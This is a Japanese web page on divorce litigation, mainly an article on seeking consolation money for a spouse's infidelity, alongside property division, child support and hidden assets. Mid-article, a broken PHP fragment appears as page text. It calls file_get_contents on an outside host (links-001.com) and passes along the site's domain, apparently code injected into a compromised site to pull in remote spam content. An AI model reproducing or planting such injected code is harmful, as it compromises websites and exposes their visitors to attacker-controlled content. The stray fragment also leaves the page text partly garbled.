前へ
次へ

離婚裁判は和解で決着が着くことが多い

離婚裁判では、裁判所が夫婦に対して、和解したらどうかということが少なくありません。それは、和解すると

more

離婚したくないのに、離婚裁判を起こされた場合

離婚裁判の中には、片方が離婚を望み、片方が離婚を望まない場合もあるでしょう。必ず、裁判を起こされたか

more

離婚裁判に必要な証拠を集めよう

離婚裁判を行うなら、少しでも有利な条件で離婚したいと誰もが感じます。そのためにも、必要な資料を用意し

more

慰謝料を受けるために離婚裁判を行う

相手から何らかのトラブルを起こされたとき、まずはそれに直接関係する損害賠償ができるでしょう。一方直接関係しないもののそのトラブルが起きたことで精神的な苦痛が残るときもあります。たんに損害賠償を受けただけだと精神的な苦痛のみが残ることになり、場合によってはそれがマイナスになるときもあります。そこで精神的苦痛の部分に対して一定の対価を受けられる慰謝料が受けられる時があります。一応法律で一定の計算方法に基づいて算出されます。離婚をするときの理由に夫の浮気があり、離婚をするにあたっては夫婦で築いた財産を分ける財産分与のほかに子供がいれば養育費を受けられます。財産分与や養育費は離婚なく夫婦生活をしていれば受けなかった損害を受ける部分の金額と言えるでしょう。一方相手に浮気をされれば精神的な苦痛が発生しますが、その対価は財産分与や養育費には含まれていません。こちらは慰謝料として別途請求して納得して離婚を行う必要があります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

相手が浮気を認めているときは比較的お金の話も進めやすいですが、慰謝料の部分に関しては進まないこともあります。妻側としては夫に対する怒りからより多く取りたいと考えますし、夫側としては離婚後の生活もあるのであまり支払いたくないと考えるでしょう。そのために話し合いでは折り合いがつきにくいです。となると離婚裁判をして裁判所から慰謝料を決めてもらうのがよさそうです。弁護士に払う費用は多くなるものの、弁護士に相談をした方が多くもらえる可能性もあります。離婚裁判を通じて慰謝料が決められる時一応一定の計算方法がとられますが、事前に裁判所に提示する資料によって金額が変わることもあります。夫はできるだけ少なく支払いたいと本来あるはずの財産を隠したりすることがあり、そのままだと慰謝料も少なくなります。弁護士によっては夫の隠し財産などを細かく調べ、適正な財産から慰謝料を計算するようにしてくれます。

Page Top